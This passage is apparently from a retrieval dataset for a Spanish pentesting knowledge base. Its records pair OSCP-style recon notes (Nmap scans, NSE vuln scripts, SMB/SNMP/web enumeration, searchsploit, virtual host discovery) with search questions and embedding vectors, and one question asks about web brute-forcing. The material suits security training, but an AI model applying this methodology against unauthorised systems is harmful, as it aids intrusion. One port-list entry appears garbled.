0.00134, -0.06495, -0.01266, -0.01183, 0.06816, -0.09124, 0.15585, 0.14995, -0.02297, 0.05447, -0.07782, 0.03979, -0.15293, 0.00547, -0.00631, -0.00085, -0.07659, 0.07921, 0.00736, -0.04729, 0.03383, -0.18936, 0.00788, 0.07163, 0.12563, 0.03494, 0.03128, 0.05231, -0.00513, -0.04776, 0.03073, 0.05137, 0.06612, -0.01102, 0.0305, 0.04257, 0.03098, -0.06708, -0.03927, 0.0527, 0.04495, -0.06036, 0.04205, -0.07571, -0.16595, -0.21572, -0.08457, -0.0564, 0.08676, -0.02893, -0.0115, 0.00214, 0.0571, 0.0412, 0.00526, -0.06462, 0.04528, 0.06264, 0.00901, -0.04988, 0.08685, -0.01909, -0.04294, -0.02313, -0.03137, -0.02146, -6e-05, 0.01642, 0.00744, -0.02746, -0.02523, 0.02043, -0.09048, 0.05734, 0.03002, -0.00177, -0.01027, -0.0513, 0.03452, 0.05603, -0.04877, 0.08652, -0.01364, 0.00848, 0.16509, 0.04084, 0.01511, 0.03439, 0.10391, -0.05957, -0.11351, 0.12014, -0.05893, 0.02776, 0.06638, 0.0168, -0.15112, -0.01442, 0.01368, -0.02885, -0.02957, -0.02869, -0.1421, -0.086, -0.12769, -0.04232, 0.04301, 0.01188, -0.02762, 0.0299, -0.08073, -0.00602, 0.12281, 0.01663, -0.014, 0.05421, -0.00646, 0.06747, 0.0181, -0.00653, -0.0652, -0.06006, -0.04651, -0.09387, 0.13739, -0.0113, 0.06763, -0.03101, -0.00444, -0.02461, 0.02419, 0.0918, 0.02872, -0.0704, 0.01235, -0.00258, 0.02137, 0.03883, -0.03577, 0.04442, 0.03705, -0.0119, -0.03156, -0.05372, 0.05424, 0.00128, -0.00683, 0.05087, -0.01703, -0.06146, 0.0311, -0.04112, 0.11259, -0.00546, 0.07519, 0.06631, 0.02251, 0.04564, 0.01329, 0.08421, -0.00868, -0.1133, -0.03752, 0.06726, 0.03037, -0.08746, 0.07779, 0.03704, -0.09253, -0.02727, 0.05533, 0.01279, 0.00456, -0.03252, 0.01315, 0.00475, -0.00617, -0.03545, -0.06483, -0.05918, -0.01694, -0.02215, 0.05279, -0.05471, -0.01805, -0.03435, -0.01403, -0.06456, -0.06016, -0.03264, -0.02847, -0.00264, 0.01485, 0.07846, -0.00393, -0.0167, 0.06507, 0.09488, -0.03804, -0.00098, 0.04224, -0.01941, -0.04927, 0.00221, -0.03575, 0.03417, 0.03838, 0.00827, -0.03893, -0.08969, -0.03351, 0.04488, -0.03583, -0.02318, 0.06458, 0.03943, -0.01171, 0.00589, 0.00592, -0.10144, 0.06018, -0.03963, -0.00964, -0.04637, -0.0166, -0.06314, 0.03396, -0.09422, 0.01066, 0.06778, -0.01208, -0.00411, -0.04488, 0.07262, -0.03266, 0.01465, -0.00342, -0.00768, -0.04089, -0.00357, 0.03109, 0.02279, 0.06198, 0.02481]} -{"tipo": "pregunta", "herramienta": "EnumeraciΓ³n", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/EnumeraciΓ³n.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Flujo\n1. **Mi IP / red** β†’ `ip a | grep \"inet \"` (el 3er octeto del lab **cambia** al reiniciar).\n2. **Descubrimiento de hosts** β†’ ping/ARP sweep (Nmap).\n3. **Escaneo de puertos** β†’ top-1000 **y** `-p-` completo (Puertos olvidados).\n4. **Por servicio**:\n - 445 β†’ SMB\n - UDP 161 β†’ SNMP\n - 80/443 β†’ EnumeraciΓ³n web + Content discovery + Hacking web\n - 3389 β†’ RDP\n - texto plano (!OS-57179836-OSCP.ovpn25, 110...) β†’ Netcat\n1. **Scripts NSE** β†’ Nmap NSE (`-sCV`, `--script vuln`).\n2. **VersiΓ³n + exploits** β†’ `nmap -sV` β†’ searchsploit.", "indexar": "ΒΏquΓ© herramienta puedo usar para escanear puertos completos y descubrir los servicios que estΓ‘n abiertos?", "v": [0.07655, 0.03997, -0.24186, -0.05781, 0.08954, -0.14351, 0.05728, -0.17363, -0.08778, -0.16799, -0.20682, -0.00395, -0.02883, -0.05059, -0.00458, -0.02679, 0.07605, -0.08205, 0.05423, 0.06578, -0.0473, -0.0318, -0.1227, -0.06242, -0.08281, -0.0055, 0.04969, -0.05104, -0.14428, 0.03028, -0.00993, 0.0992, 0.05403, -0.01852, -0.00426, -0.13327, 0.05599, -0.01041, 0.06109, 0.00106, 0.06897, -0.01324, -0.0416, -0.04033, 0.10045, -0.00418, -0.09248, -0.01261, -0.03204, 0.06492, -0.04521, -0.1038, -0.16081, 0.01723, -0.01875, -0.0956, 0.12596, 0.01419, 0.00891, -0.10194, -0.05948, 0.11078, -0.00695, -0.02282, 0.02192, -0.17309, -0.02085, 0.07552, -0.05925, 0.07424, -0.11689, 0.03579, 0.0535, 0.08939, -0.06065, -0.03755, -0.02355, 0.04626, 0.04476, 0.12638, 0.06814, 0.03824, -0.06655, -0.04856, -0.04903, -0.05761, 0.01395, -0.05341, 0.04108, -0.16054, 0.04502, 0.06549, -0.05307, 0.07594, -0.08211, 0.03043, 0.03183, -0.01941, -0.03375, -0.01134, 0.12735, 0.02236, -0.04067, 0.06495, -0.03922, -0.00771, -0.01811, -0.09758, -0.04579, 0.01201, 0.06161, 0.02433, -0.00692, -0.03184, -0.07881, 0.04158, -0.03477, -0.12112, -0.03685, -0.03558, 0.02296, -0.02004, -0.05728, 0.00231, 0.04652, -0.06077, -0.02219, 0.07841, 0.03262, -0.01419, 0.03491, -0.0352, -0.15352, -0.05397, -0.0385, -0.07474, 0.0151, -0.13234, 0.04886, -0.02818, -0.06385, 0.03304, -0.0538, -0.05584, 0.02906, 0.02773, 0.00711, -0.02563, -0.05222, -0.04691, 0.0294, 0.02493, -0.06741, 0.07336, -0.05309, 0.02185, 0.09756, -0.01, -0.08432, 0.05396, -0.05456, -0.0213, 0.01061, 0.02268, 0.05004, -0.09406, 0.02323, -0.03427, 0.0125, 0.02452, 0.02705, 0.09252, 0.01239, -0.05412, 0.02139, -0.0499, -0.05021, -0.03566, -0.0142, -0.06227, -0.04127, 0.02139, -0.08338, -0.06727, -0.02972, -0.05105, 0.04491, -0.0991, -0.0527, 0.07505, -0.02428, 0.02885, 0.02794, -0.055, 0.00183, 0.0188, 0.01635, 0.00828, -0.01092, -0.03499, 0.00175, 0.03306, -0.04458, -0.03709, 0.03978, 0.03712, -0.07799, 0.02015, 0.004, 0.06082, -0.00498, -0.05632, 0.08072, -0.02962, -0.05475, -0.01134, -0.03069, 0.03174, 0.01952, 0.02237, -0.03099, 0.05679, 0.02159, 0.01275, 0.05506, 0.0219, 0.04197, -0.00603, 0.01536, 0.02085, 0.05065, -0.00981, -0.07141, -0.00822, -0.0071, -0.05112, 0.0397, -0.02399, -0.05582, -0.0187, 0.02038, 0.07327, 0.00856, -0.01618, -0.00508, -0.07934, -0.0222, 0.01698, -0.02141, -0.05504, -0.04967, 0.06531, 0.02406, -0.07996, 0.05623, -0.02721]} -{"tipo": "pregunta", "herramienta": "EnumeraciΓ³n", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/EnumeraciΓ³n.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Flujo\n1. **Mi IP / red** β†’ `ip a | grep \"inet \"` (el 3er octeto del lab **cambia** al reiniciar).\n2. **Descubrimiento de hosts** β†’ ping/ARP sweep (Nmap).\n3. **Escaneo de puertos** β†’ top-1000 **y** `-p-` completo (Puertos olvidados).\n4. **Por servicio**:\n - 445 β†’ SMB\n - UDP 161 β†’ SNMP\n - 80/443 β†’ EnumeraciΓ³n web + Content discovery + Hacking web\n - 3389 β†’ RDP\n - texto plano (!OS-57179836-OSCP.ovpn25, 110...) β†’ Netcat\n1. **Scripts NSE** β†’ Nmap NSE (`-sCV`, `--script vuln`).\n2. **VersiΓ³n + exploits** β†’ `nmap -sV` β†’ searchsploit.", "indexar": "con quΓ© programa puedo identificar automΓ‘ticamente el sistema operativo y buscar posibles vulnerabilidades en Γ©l?", "v": [0.0428, 0.21548, -0.13968, -0.08179, 0.0353, -0.03907, 0.04308, -0.11624, -0.16451, -0.07688, -0.01923, -0.09741, -0.00348, -0.02482, 0.05029, 0.04324, 0.08778, -0.13768, -0.00506, -0.04949, -0.09216, -0.10637, -0.00213, -0.07473, -0.03726, 0.07896, -0.08948, -0.03081, -0.09738, -0.04613, -0.01643, 0.05926, 0.09312, -0.10791, -0.06659, 0.09486, -0.01453, 0.06727, 0.03386, 0.00745, 0.05234, 0.01924, -0.04968, 0.10151, 0.17237, -0.05008, -0.00514, -0.0899, 0.03118, -0.10718, -0.05091, -0.02316, -0.15511, -0.09266, 0.09722, -0.10837, 0.14842, -0.0573, 0.03769, -0.02295, -0.06698, 0.04575, 0.04278, -0.01, 0.08315, 0.01733, 0.07083, 0.03973, -0.03413, 0.09155, 0.0233, 0.00197, 0.00447, 0.08741, 0.0355, 0.11973, 0.01735, 0.03775, 0.08323, -0.05018, -0.01618, 0.017, 0.00787, 0.12515, -0.09446, -0.12113, 0.06387, -0.03155, -0.01645, -0.06871, 0.09187, 0.01606, -0.0129, 0.10369, 0.07744, -0.01607, 0.10474, 0.01171, -0.04904, 0.0581, -0.08205, -0.11535, -0.11414, 0.15711, -0.04615, 0.00351, 0.06551, 0.0234, -0.02306, -0.04909, -0.05147, -0.07326, -0.05247, -0.07611, -0.04486, 0.02808, -0.01695, -0.01178, 0.06976, -0.02471, -0.06841, 0.03334, -0.023, 0.01773, 0.09366, -0.05105, -0.01453, 0.12637, 0.02455, 0.02529, 0.019, -0.00432, -0.03995, -0.0325, -0.03844, -0.01017, 0.0073, -0.0229, 0.01673, -0.00254, 0.02338, 0.04649, 0.0854, -0.05519, 0.07167, 0.0306, 0.05541, -0.11117, -0.00991, -0.00643, -0.0091, 0.04539, -0.02903, 0.03541, -0.03328, 0.00752, 0.0059, -0.03918, -0.02882, -0.01252, 0.02024, 0.02389, -0.03965, 0.01663, 0.01401, 0.00405, 0.03591, -0.04676, 0.1294, 0.02589, -0.04073, 0.07069, 0.07173, -0.05311, -0.0192, -0.02966, -0.00324, -0.09608, 0.07075, -0.03649, -0.08973, 0.0252, 0.04546, -0.02374, -0.01754, -0.05806, -0.01426, 0.02408, 0.05305, 0.00474, 0.01944, 0.02933, -0.04682, 0.03142, 0.00624, -0.01772, -0.01617, -0.00801, 0.01793, -0.05009, -0.10788, 0.01985, 0.0448, -0.03594, 0.04462, 0.08084, 0.01704, 0.01434, 0.05162, 0.11266, 0.00348, -0.02535, 0.11792, -0.06024, -0.09336, -0.00684, -0.03717, 0.00967, 0.03336, -0.01617, 0.02047, 0.00888, 0.10129, 0.1173, 0.01231, -0.02619, 0.01196, 0.04766, 0.05367, -0.00242, -0.01646, -0.05231, -0.03306, -0.03873, 0.07017, -0.04446, 0.00257, -0.03828, -0.02067, -0.05554, 0.02607, 0.07366, 0.02308, -0.07255, -0.02217, -0.03425, -0.05632, 0.02829, -0.03556, -0.06492, -0.05032, 0.06147, 0.03649, -0.10139, 0.04822, -0.03974]} -{"tipo": "pregunta", "herramienta": "EnumeraciΓ³n", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/EnumeraciΓ³n.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## No olvides\n- Trampas de enumeraciΓ³n (UDP, puertos altos, vhosts, wordlists pequeΓ±as).\n- Automatiza con Bucles bash sobre IPs.\n- La web es su propio mundo β†’ Hacking web.\n\nRelacionado: Operadores Bash Β· OSCP MOC", "indexar": "que herramienta me sirve para hacer pruebas de enumeraciΓ³n de puertos en redes locales", "v": [0.00123, 0.00285, -0.22621, -0.2615, 0.03284, -0.04643, 0.02487, -0.03367, -0.02646, -0.19259, -0.11178, 0.07491, 0.05998, -0.1451, 0.0854, 0.01292, 0.02513, -0.03444, 0.08169, -0.06789, -0.10092, -0.02796, -0.17579, -0.00125, 0.02028, 0.04022, 0.0558, -0.0625, -0.145, 0.07302, -0.06743, 0.0545, 0.05166, -0.03693, -0.06893, -0.08911, 0.02318, 0.03286, 0.00043, 0.06975, 0.10303, 0.04183, -0.09969, -0.05483, 0.05217, 0.0383, -0.09147, -0.07017, -0.01188, -0.00898, -0.06704, -0.11961, -0.12835, -0.04872, -0.08556, -0.07637, 0.08752, -0.08594, -0.03545, -0.07051, -0.05635, -0.11979, -0.01686, -0.03131, 0.06101, -0.01181, -0.0012, 0.07169, -0.09861, 0.07036, -0.02359, 0.08817, 0.09744, -0.03905, -0.06711, -0.02057, 0.02232, 0.0847, 0.05955, 0.03571, 0.02501, -0.04554, -0.0238, -0.02759, -0.05244, -0.0374, -0.01561, -0.06952, 0.08364, -0.10624, -0.00095, -0.00479, 0.01504, 0.03836, 0.00318, -0.00782, 0.03157, -0.03309, 0.01341, -0.02151, 0.14203, -0.05073, -0.06119, 0.03704, -0.04216, -0.02974, -0.02291, -0.01661, 0.04345, -0.04691, 0.17246, 0.04541, -0.00753, 0.02277, -0.07163, 0.04179, -0.01231, -0.07706, 0.00794, 0.0762, 0.03982, -0.07697, -0.11039, -0.04169, -0.03809, 0.04336, -0.0164, 0.08228, 0.07996, 0.00123, 0.10573, 0.03828, -0.04669, -0.0573, -0.04863, -0.07526, -0.00712, -0.15387, -0.01649, -0.07416, -0.08504, 0.0369, -0.07442, -0.06809, 0.02486, 0.10316, -0.00663, -0.03935, -0.08563, 0.01504, 0.0207, -0.04021, -0.12531, 0.03747, -0.11277, 0.05801, 0.07113, 0.00506, -0.066, 0.04068, 0.0024, -0.05121, -0.00285, -0.00048, 0.02283, -0.01886, -0.02338, 0.06498, 0.07386, 0.01724, -0.02353, 0.11443, -0.06143, -0.07538, 0.0333, 0.03689, -0.01977, -0.00955, -0.09701, -0.04217, -0.03475, 0.02371, -0.02127, -0.00048, 0.01715, -0.07787, 0.039, -0.06204, 0.01766, 0.07204, -0.02809, -0.02087, 0.00632, 0.01983, 0.05672, 0.03821, 0.042, 0.02791, 0.013, -0.02802, -0.02418, -0.0676, -0.00455, -0.01654, 0.02092, 0.1126, -0.08032, -0.01851, 0.00907, 0.05985, -0.03487, 0.00166, 0.0377, -0.02971, -0.02073, -0.02583, 0.02755, -0.0168, -0.02591, 0.05155, -0.03436, -0.00442, -0.02331, 0.07064, -0.03186, 0.07557, -0.00757, -0.02191, 0.01405, -0.00533, 0.06987, -0.07396, -0.03144, -0.02074, -0.01374, -0.07955, -0.00207, 0.02124, -0.03079, -0.05209, -0.03111, -0.00662, -0.0008, 0.01349, -0.00425, -0.0461, -0.0348, -0.04525, 0.00907, -0.02256, -0.05761, -0.01027, 0.05996, 0.01004, 0.01032, -0.01896]} -{"tipo": "pregunta", "herramienta": "EnumeraciΓ³n", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/EnumeraciΓ³n.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## No olvides\n- Trampas de enumeraciΓ³n (UDP, puertos altos, vhosts, wordlists pequeΓ±as).\n- Automatiza con Bucles bash sobre IPs.\n- La web es su propio mundo β†’ Hacking web.\n\nRelacionado: Operadores Bash Β· OSCP MOC", "indexar": "con que puedo automatizar la verificaciΓ³n de puertos abiertos usando bucles bash", "v": [0.22373, 0.04608, -0.19035, 0.00616, -0.01098, -0.02028, 0.10044, -0.14407, -0.08086, -0.12031, -0.09138, -0.04754, -0.01506, 0.13364, -0.04779, -0.08637, -0.11781, -0.06961, -0.0469, 0.06999, 0.18293, -0.10338, -0.07327, -0.01763, 0.04251, 0.06458, -0.08804, -0.01699, -0.1686, -0.03643, -0.02359, 0.02863, 0.07612, 0.08227, 0.0854, -0.1193, 0.00278, 0.03402, 0.06123, 0.09433, -0.02156, 0.07471, -0.06109, 0.08554, 0.17521, -0.06585, -0.00196, -0.03476, 0.01943, -0.08639, -0.01313, -0.06518, -0.1874, 0.02682, -0.01628, -0.04496, 0.10125, 0.0488, -0.00299, -0.01823, -0.03639, 0.0395, 0.04017, 0.06286, -0.04683, 0.02258, 0.10714, -0.01128, -0.06722, 0.0232, -0.01153, 0.02889, -0.06361, 0.08141, -0.01942, -0.00702, -0.01466, 0.06399, 0.04292, 0.12735, 0.015, -0.01458, 0.06734, 0.08244, -0.02294, -0.01957, -0.12531, -0.07765, 0.00367, -0.09326, 0.04637, 0.00026, 0.02345, 0.08612, 0.04858, 0.05373, -0.0045, 0.02289, -0.04597, 0.06643, 0.07223, 0.02541, -0.05837, 0.089, -0.0121, -0.01685, 0.04214, -0.11148, 0.07064, -0.02126, 0.0789, -0.00174, 9e-05, -0.08367, 0.03667, 0.0212, -0.01726, -0.06766, -0.00983, -0.05705, 0.01968, -0.12684, -0.02651, -0.01852, 0.02376, -0.03741, 0.04208, 0.14312, 0.00574, 0.01562, 0.07603, 0.02051, -0.1038, -0.07099, -0.00484, -0.04934, -0.04393, -0.11995, -0.02957, -0.05197, -0.06105, 0.13596, -0.02532, -0.01339, 0.10285, 0.00451, -0.05652, -0.06415, -0.08067, -0.02533, -0.01492, -0.03405, 0.00333, 0.06337, -0.084, 0.05137, 0.10849, -0.03781, 0.03022, 0.00679, 0.02238, 0.03509, -0.11513, 0.04061, 0.01941, -0.0144, -0.0147, 0.01639, 0.00267, 0.0129, -0.01743, 0.03712, -0.08059, -0.02144, 0.06316, 0.06234, -0.0779, -0.03545, 0.00053, -0.04298, -0.03211, 0.02082, -0.04858, -0.08976, -0.04109, -0.00069, 0.03354, -0.05535, 0.05394, 0.11765, 0.00216, -0.00183, -0.0069, -0.01514, 0.01278, 0.01743, 0.01001, 0.00401, -0.03477, -0.03754, 0.0397, 0.07475, 0.01394, -0.08616, 0.03983, 0.08767, -0.06294, 0.00299, 0.02365, 0.03282, 0.02019, -0.01963, 0.03205, -0.0494, -0.03104, -0.01029, -0.01785, -0.02351, 0.02528, -0.00353, -0.05494, 0.02479, -0.01393, 0.05914, -0.00662, 0.02456, 0.04053, 0.02864, 0.04344, 0.03541, -0.03023, 0.03383, -0.04279, -0.01729, 0.03007, 0.01769, 0.01263, 0.00727, 0.01347, -0.07728, 0.05961, -0.00901, -0.04002, -0.0831, 0.00356, -0.0534, -0.07783, 0.017, -0.00014, -0.04472, -0.07549, 0.06258, -0.03495, -0.0681, -0.01731, -0.02664]} -{"tipo": "pregunta", "herramienta": "EnumeraciΓ³n", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/EnumeraciΓ³n.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## No olvides\n- Trampas de enumeraciΓ³n (UDP, puertos altos, vhosts, wordlists pequeΓ±as).\n- Automatiza con Bucles bash sobre IPs.\n- La web es su propio mundo β†’ Hacking web.\n\nRelacionado: Operadores Bash Β· OSCP MOC", "indexar": "que programa es mejor para realizar ataques de fuerza bruta a servidores web", "v": [-0.00359, -0.03069, -0.22938, -0.18402, -0.02049, 0.00963, 0.14332, -0.05223, 0.02061, -0.08497, -0.02837, 0.01559, -0.01527, -0.01413, 0.04052, -0.04239, 0.06008, -0.10859, 0.05076, 0.012, 0.03129, -0.03336, 0.11434, -0.00958, -0.12055, -0.00715, -0.03767, 0.09485, -0.05376, -0.00367, 0.03763, 0.01811, 0.11767, -0.07478, 0.09188, 0.03246, -0.04376, 0.13318, 0.12153, 0.08571, -0.03154, 0.04099, -0.15999, -0.08513, 0.03286, 0.02971, 0.03678, -0.04589, 0.06319, -0.05381, -0.07975, -0.01315, -0.06716, -0.06481, -0.10801, -0.10897, -0.04219, -0.15531, -0.11327, 0.03253, -0.12254, 0.09466, -0.04672, -0.09231, 0.04407, -0.01949, 0.00747, -0.05161, -0.07005, -0.01698, -0.10072, -0.04727, -0.02588, -0.0417, -0.04686, 0.03193, -0.0183, 0.01839, 0.0121, 0.00217, -0.04154, 0.06882, -0.14062, 0.08803, -0.20793, -0.02269, 0.01858, -0.05938, -0.0663, -0.03591, 0.08007, 0.03104, -0.03384, 0.06132, -0.02528, -0.01782, 0.0978, -0.05382, 0.03331, -0.06029, 0.00645, -0.08709, -0.06052, -0.01308, 0.04769, 0.08925, 0.01608, 0.01226, -0.02484, -0.0042, -0.01697, -0.11233, -0.06129, 0.02386, -0.05079, -0.05917, -0.07606, -0.08836, 0.04927, -0.02259, -0.15025, 0.0413, -0.03886, 0.10749, 0.00774, 0.05738, 0.07397, -0.00309, -0.03979, -0.11797, 0.01347, 0.00489, 0.02422, 0.00822, -0.04429, -0.03282, 0.09601, -0.0956, 0.01319, -0.06977, -0.00624, 0.06524, -0.0115, 0.02359, 0.07766, 0.00655, 0.03651, -0.02683, -0.08644, 0.02172, 0.04008, -0.01458, 0.01496, 0.04488, -0.13781, -0.03548, -0.00832, -0.08849, -0.11332, 0.05861, -0.01818, -0.00855, -0.09376, 0.03295, 0.02119, 0.04422, -0.08498, 0.08157, 0.0801, 0.04343, -0.02581, 0.03744, 0.0575, -0.06296, -0.01048, -0.03472, -0.06719, -0.01694, 0.05436, 0.01972, -0.04514, -0.0004, -0.00056, 0.02934, -0.05713, -0.03559, 0.03901, 0.01372, -0.00067, -0.02588, 0.02019, -0.01577, -0.06277, 0.08527, 0.06295, -0.06591, -0.11171, 0.01713, 0.00837, -0.0082, -0.01548, -0.08874, -0.03136, -0.04316, 0.01417, 0.09175, 0.01212, -0.06303, 0.00288, 0.06706, -0.0148, -0.03076, 0.06861, -0.09722, -0.03066, -0.03883, 0.05307, 0.00165, 0.01971, -0.00872, -0.03118, 0.01383, 0.00297, 0.04059, -0.0273, -0.02311, 0.01486, -0.07424, 0.05604, 0.04669, -0.01571, -0.08953, 0.00261, -0.04446, -0.05104, -0.03284, 0.02619, -0.01105, -0.07221, -0.03012, -0.04683, 0.07307, -0.00406, -0.08565, -0.03668, -0.0488, -0.08677, -0.04146, -0.02577, 0.00788, 0.00366, 0.01607, 0.05166, 0.00781, -0.00393, 0.00899]} -{"tipo": "pregunta", "herramienta": "Vhosts y subdominios", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Vhosts y subdominios.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# Vhosts y subdominios\n\n> Si te encuentras una \"default Apache page\", probablemente hay **virtual hosts** ocultos. Parte de Trampas de enumeraciΓ³n.", "indexar": "ΒΏcon quΓ© herramienta puedo detectar si hay servidores virtuales ocultos en mi red?", "v": [0.05953, 0.05151, -0.17708, -0.09787, 0.03264, -0.07368, -0.06222, -0.05568, 0.10406, -0.1852, -0.08904, -0.11976, -0.00699, -0.10964, 0.18038, 0.15533, 0.14672, -0.08925, 0.0768, 0.00965, 0.04353, -0.0726, -0.08725, -0.0044, -0.02598, 0.06935, 0.04568, -0.06183, -0.02856, 0.00352, 0.04314, 0.01572, 0.04188, 0.00145, -0.13992, -0.01668, -0.03922, 0.07167, 0.00686, 0.05248, 0.08673, 0.10263, -0.02009, -0.00455, 0.11337, -0.03282, -0.07132, -0.03155, -0.04905, 0.03321, -0.10481, -0.18189, -0.18423, -0.10036, -0.03433, -0.14317, 0.11676, -0.01276, 0.11808, -0.06572, -0.09093, 0.00794, 0.01868, 0.05089, 0.06102, -0.06517, 0.01669, -0.03948, -0.15668, 0.05365, -0.04657, 0.02028, 0.01265, 0.02636, 0.03665, 0.03156, -0.00758, -0.04008, 0.11661, 0.03761, 0.00333, 0.09405, -0.0046, 0.08418, -0.02435, -0.12337, -0.04829, 0.00237, 0.03177, -0.07946, 0.01414, 0.11264, -0.01165, 0.01247, 0.01341, 0.01745, 0.1389, -0.08016, -0.09508, 0.03383, 0.05165, 0.04076, -0.07766, 0.04078, -0.04966, 0.06272, -0.03519, -0.04603, 0.01184, -0.0552, 0.06691, -0.06386, -0.02116, 0.025, 0.07109, 0.04561, 0.08822, 0.02379, 0.04417, 0.02, -0.02914, 0.04979, -0.03724, -0.05881, 0.03707, -0.08885, -0.02541, 0.02954, -0.03199, -0.06097, -0.03558, -0.06791, -0.0572, -0.08601, -0.0922, 0.03782, 0.05513, -0.11495, -0.02513, -0.05214, -0.02102, -0.01804, -0.09817, -0.09212, 0.06923, 0.03265, 0.07678, -0.06661, -0.04523, -0.00447, 0.03651, -0.04742, -0.02789, -0.01413, -0.04504, 0.05987, -0.0098, -0.02816, -0.14778, 0.01963, -0.02601, 0.00638, 0.02403, 0.03045, -0.0078, -0.0175, 0.03487, 0.03583, 0.07083, 0.05526, -0.01976, -0.01561, 0.0108, -0.06418, -0.04859, -0.03668, -0.04401, -0.04918, 0.07577, -0.07387, 0.01258, 0.03654, -0.00835, -0.05289, 0.00245, -0.03974, 0.02017, -0.0409, -0.02931, 0.01034, 0.03305, -0.08714, 0.00393, 0.01705, 0.09134, -0.00889, 0.03729, -0.03991, 0.04173, -0.066, -0.02001, -0.04247, -0.04684, 0.00797, -0.0314, 0.02926, -0.03629, 0.03466, 0.0017, 0.04765, 0.03744, -0.00472, 0.05915, -0.08546, -0.008, 0.01125, 0.0133, 0.00155, -0.02083, -0.07215, 0.05465, -0.01357, 0.04082, 0.01102, -0.0033, 0.07841, -0.02081, 0.02934, 0.04879, -0.02104, 0.04218, -0.03453, -0.01463, -0.00105, -0.05416, -0.1021, 0.0523, 0.03065, -0.07148, 0.00544, 0.01086, 0.0672, 0.03302, -0.05538, 0.00581, -0.04958, -0.01813, -0.00953, -0.04485, -0.04642, -0.06001, 0.01756, 0.064, -0.04984, -0.00934, -0.00199]} -{"tipo": "pregunta", "herramienta": "Vhosts y subdominios", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Vhosts y subdominios.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# Vhosts y subdominios\n\n> Si te encuentras una \"default Apache page\", probablemente hay **virtual hosts** ocultos. Parte de Trampas de enumeraciΓ³n.", "indexar": "ΒΏquΓ© programa me ayuda a encontrar pΓ‘ginas por defecto de Apache?", "v": [-0.15038, 0.21161, 0.03837, -0.06981, 0.03997, -0.03501, 0.0646, -0.10836, -0.19228, -0.04116, 0.01033, -0.03894, -0.19439, -0.10588, 0.03555, -0.12389, 0.02972, -0.02659, 0.19204, -0.01842, 0.05912, -0.01243, -0.07123, 0.00845, -0.10986, -0.05031, 0.14808, 0.06969, -0.06645, -0.11686, -0.06632, -0.10391, -0.01182, -0.00626, -0.05934, 0.08214, 0.20969, -0.08192, 0.02809, 0.09031, 0.027, -0.16279, 0.01878, -0.01774, 0.08658, 0.03745, 0.03351, 0.02731, -0.02522, 0.07576, -0.09456, 0.00239, -0.05181, 0.01707, -0.01719, -0.02214, 0.14147, -0.09828, -0.02048, -0.09421, -0.08947, -0.02637, 0.02334, -0.06119, 0.01888, -0.05411, -0.04951, -0.04981, -0.01922, 0.03584, -0.07007, 0.00235, 0.08096, -0.04714, -0.03983, 0.02774, 0.02355, -0.03735, 0.04116, -0.08331, 0.05029, 0.09892, 0.01108, 0.03959, -0.04967, -0.01274, -0.01053, 0.07287, 0.01849, -0.11369, 0.01435, 0.03234, 0.02984, 0.04953, -0.06482, -0.09152, 0.06262, -0.0082, 0.04506, -0.01571, -0.02653, -0.05416, -0.03251, 0.00032, -0.02513, 0.02324, 0.0195, 0.02483, -0.14595, 0.08973, 0.08809, -0.01339, -0.02002, -0.03372, -0.08269, 0.03387, 0.0616, 0.06384, 0.03482, -0.11246, -0.10277, 0.08058, -0.09967, 0.05366, 0.11099, 0.05609, 0.06659, 0.10645, -0.0659, 0.03612, 0.05647, -0.06675, -0.00043, -0.07788, -0.01087, -0.02366, 0.06334, 0.00386, -0.00416, 0.0152, 0.08105, -0.06156, 0.00065, 0.01498, -0.01329, -0.04993, 0.05544, -0.00759, -0.05316, 0.0159, -0.00186, 0.02851, 0.06339, 0.02807, -0.05236, -0.04492, 0.0638, 0.00092, -0.03565, -0.05605, -0.05291, 0.03442, 0.05064, -0.05881, 0.00992, 0.01146, -0.05308, 0.05223, 0.05909, 0.04888, -0.02093, 0.03, 0.04001, -0.07026, -0.09677, -0.07618, -0.02469, -0.06325, 0.01372, 0.05571, -0.05856, -0.0079, 0.10511, 0.05285, 0.02746, 0.00319, -0.00372, -0.04161, 0.00043, -0.03309, -0.00272, -0.02803, -0.03391, -0.07464, -0.01685, 0.01305, -0.0021, -0.01324, 0.0664, -0.07825, -0.01665, -0.04351, -0.01119, 0.0141, 0.04512, 0.06679, -0.0618, -0.02238, 0.02232, 0.03122, -0.01976, -0.00613, 0.01684, 0.01213, -0.05618, 0.01341, -0.02165, 0.01518, 0.02892, -0.0291, 0.03189, -0.03223, 0.02306, 0.07566, 0.03308, -0.10841, 0.08298, 0.01778, 0.02484, 0.04986, -0.00351, -0.07676, 0.00592, -0.02609, -0.02046, -0.07643, 0.00509, 0.08036, 0.01869, -0.01475, -0.01816, 0.04431, 0.02755, -0.02178, 0.02397, 0.00447, -0.04147, -0.01583, 0.01035, 0.09432, -0.09682, -0.00329, 0.02002, -0.06913, 0.09829, 0.02978]} -{"tipo": "pregunta", "herramienta": "Vhosts y subdominios", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Vhosts y subdominios.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# Vhosts y subdominios\n\n> Si te encuentras una \"default Apache page\", probablemente hay **virtual hosts** ocultos. Parte de Trampas de enumeraciΓ³n.", "indexar": "cual es una tecnica para buscar virtual hosts escondidos en el sistema?", "v": [0.16679, -0.03365, -0.18005, -0.0199, 0.0208, -0.07397, -0.05515, -0.13971, 0.14496, -0.1177, -0.0991, -0.09999, -0.05592, 0.03269, 0.14735, 0.02773, 0.15743, -0.07767, 0.12713, 0.10228, -0.06026, -0.05505, -0.11476, 0.01088, 0.00921, -0.01368, -0.05352, -0.09302, -0.16037, -0.01789, 0.01883, 0.05759, -0.05496, -0.03008, -0.00837, -0.03084, 0.05264, 